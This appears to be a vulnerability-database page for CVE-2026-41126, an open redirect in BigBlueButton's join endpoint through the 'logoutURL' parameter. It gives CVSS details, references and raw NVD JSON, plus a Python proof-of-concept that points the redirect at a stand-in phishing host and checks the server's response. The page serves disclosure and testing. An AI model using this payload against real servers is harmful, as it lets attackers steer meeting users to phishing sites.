CVE-2026-41126

Description

BigBlueButton is an open-source virtual classroom. Versions prior to 3.0.24 have an Open Redirect through bigbluebutton/api/join via get-parameter "logoutURL." Version 3.0.24 has adjusted the handling of requests with incorrect checksum so that the default logoutURL is used. No known workarounds are available.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

BigBlueButton < 3.0.24

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-41126 BigBlueButton Open Redirect Vulnerability
# This script demonstrates the open redirect vulnerability via the 'logoutURL' parameter.

import requests

def check_poc(target_domain, meeting_id, password):
    # Target endpoint vulnerable to open redirect
    base_url = f"{target_domain}/bigbluebutton/api/join"
    
    # Malicious URL to which the victim will be redirected
    evil_site = "http://attacker-controlled.com/phishing"
    
    # Construct the payload
    params = {
        "meetingID": meeting_id,
        "password": password,
        "fullName": "TestUser",
        "logoutURL": evil_site
    }
    
    try:
        # Send the request
        response = requests.get(base_url, params=params, allow_redirects=False)
        
        # Check for HTTP 302/301 Redirect
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location')
            if location and evil_site in location:
                print(f"[+] Vulnerability Confirmed!")
                print(f"[+] Server redirects to: {location}")
                return True
        
        print("[-] Vulnerability not detected or invalid parameters.")
        return False
        
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    target = "http://example-bbb-site.com"
    check_poc(target, "test_meeting", "attendee_pw")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41126
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41126
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41126/
[4] VulDB https://vuldb.com/cve/CVE-2026-41126
[5] https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-cvwj-4pcp-f3g8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41126", "sourceIdentifier": "[email protected]", "published": "2026-04-22T00:16:28.327", "lastModified": "2026-04-22T20:26:20.563", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "BigBlueButton is an open-source virtual classroom. Versions prior to 3.0.24 have an Open Redirect through bigbluebutton/api/join via get-parameter \"logoutURL.\" Version 3.0.24 has adjusted the handling of requests with incorrect checksum so that the default logoutURL is used. No known workarounds are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-cvwj-4pcp-f3g8", "source": "[email protected]"}]}}